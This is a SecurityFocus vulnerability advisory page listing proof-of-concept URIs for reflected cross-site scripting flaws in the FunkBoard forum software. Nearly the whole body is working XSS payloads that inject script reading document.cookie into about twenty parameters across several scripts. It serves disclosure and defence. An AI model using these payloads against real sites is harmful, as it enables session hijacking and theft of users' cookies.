Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

FunkBoard Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/funkboard/editpost.php?fbusername="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/editpost.php?fbpassword="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/prefs.php?fbpassword="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/prefs.php?fbusername="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/newtopic.php?forumid=1&fbusername="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/newtopic.php?forumid=1&fbpassword="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/newtopic.php?forumid=1&subject="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/reply.php?forumid=1&threadid=1&fbusername="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/reply.php?forumid=1&threadid=1&fbpassword="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/profile.php?fbusername="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/profile.php?fbpassword="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/register.php?fbusername="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/register.php?fmail="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/register.php?www="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/register.php?icq="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/register.php?yim="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/register.php?location="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/register.php?sex="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/register.php?interebbies="><script>alert(document.cookie)</script>
http://www.example.com/funkboard/register.php?sig=</textarea><script>alert(document.cookie)</script>
http://www.example.com/funkboard/register.php?aim="><script>alert(document.cookie)</script>







 

Privacy Statement
Copyright 2009, SecurityFocus